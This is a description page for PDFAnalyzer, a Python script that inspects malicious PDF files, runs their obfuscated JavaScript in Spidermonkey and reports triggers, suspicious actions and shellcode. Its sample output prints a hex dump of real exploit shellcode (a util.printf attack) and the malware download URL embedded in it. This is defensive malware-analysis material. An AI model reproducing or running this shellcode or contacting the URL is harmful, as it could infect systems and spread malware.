PDFAnalyzer |
Language: Python
Publication date: 2009-06-02
Updated: 2010-01-10
Description: Script to analyze malicious PDF files containing obfuscated Javascript code. It uses Spidermonkey to execute the found Javascript code and showing the shellcode to be launched. Sometimes it's not able to deobfuscate the code, but you can specify the parameter -w to write to disk the Javascript code, helping to carry out a later manual analysis. Its output has five sections where you can find trigger events (/OpenAction and /AA), suspicious actions (/JS, /Launch, /SubmitForm and /ImportData), vulnerable elements, escaped bytes and URLs, which can be useful to get an idea of the file risk.
Requirements: Spidermonkey (and Pyrex).
Usage
Usage: pdf-analyzer [-w] file
Arguments:
file: the PDF file to be analyzed.
Options:
-w: write JS code and shellcode to disk
# pdf-analyzer sample.pdf
File: sample.pdf
Trigger events:
/OpenAction
/AA
Suspicious actions:
/JS
Vulnerable elements:
util.printf
Unescaped bytes:
43 43 43 43 43 43 eb 0f 5b 33 c9 66 b9 80 01 80 |CCCCCC..[3.f....|
33 ef 43 e2 fa eb 05 e8 ec ff ff ff 7f 8b 4e df |3.C..........N.|
ef ef ef 64 af e3 64 9f f3 42 64 9f e7 6e 03 ef |...d..d..Bd..n..|
eb ef ef 64 03 b9 87 61 a1 e1 03 07 11 ef ef ef |...d...a........|
66 aa eb b9 87 77 11 65 e1 07 1f ef ef ef 66 aa |f....w.e......f.|
e7 b9 87 ca 5f 10 2d 07 0d ef ef ef 66 aa e3 b9 |...._.-.....f...|
87 00 21 0f 8f 07 3b ef ef ef 66 aa ff b9 87 2e |..!...;...f.....|
96 0a 57 07 29 ef ef ef 66 aa fb af 6f d7 2c 9a |..W.)...f...o.,.|
15 66 aa f7 06 e8 ee ef ef b1 66 9a cb 64 aa eb |.f........f..d..|
85 ee b6 64 ba f7 b9 07 64 ef ef ef bf 87 d9 f5 |...d....d.......|
c0 9f 07 78 ef ef ef 66 aa f3 64 2a 6c 2f bf 66 |...x...f..d*l/.f|
aa cf 87 10 ef ef ef bf 64 aa fb 85 ed b6 64 ba |........d.....d.|
f7 07 8e ef ef ef ec aa cf 28 ef b3 91 c1 8a 28 |.........(.....(|
af eb 97 8a ef ef 10 9a cf 64 aa e3 85 ee b6 64 |.........d.....d|
ba f7 07 af ef ef ef 85 e8 b7 ec aa cb dc 34 bc |..............4.|
bc 10 9a cf bf bc 64 aa f3 85 ea b6 64 ba f7 07 |......d.....d...|
cc ef ef ef 85 ef 10 9a cf 64 aa e7 85 ed b6 64 |.........d.....d|
ba f7 07 ff ef ef ef 85 10 64 aa ff 85 ee b6 64 |.........d.....d|
ba f7 07 ef ef ef ef ae b4 bd ec 0e ec 0e ec 0e |................|
ec 0e 6c 03 eb b5 bc 64 35 0d 18 bd 10 0f ba 64 |..l....d5......d|
03 64 92 e7 64 b2 e3 b9 64 9c d3 64 9b f1 97 ec |.d..d...d..d....|
1c b9 64 99 cf ec 1c dc 26 a6 ae 42 ec 2c b9 dc |..d.....&..B.,..|
19 e0 51 ff d5 1d 9b e7 2e 21 e2 ec 1d af 04 1e |..Q......!......|
d4 11 b1 9a 0a b5 64 04 64 b5 cb ec 32 89 64 e3 |......d.d...2.d.|
a4 64 b5 f3 ec 32 64 eb 64 ec 2a b1 b2 2d e7 ef |.d...2d.d.*..-..|
07 1b 11 10 10 ba bd a3 a2 a0 a1 ef 68 74 74 70 |............http|
3a 2f 2f 77 77 77 2e 6b 6f 6e 74 65 72 2e 62 69 |://www.konter.bi|
7a 2f 6d 79 79 2f 6c 6f 61 64 2e 70 68 70 3f 69 |z/myy/load.php?i|
64 3d 36 35 39 33 26 73 70 6c 3d 36 39 00 |d=6593&spl=69.|
URLs in shellcode:
http://www.konter.biz/myy/load.php?id=6593&spl=69
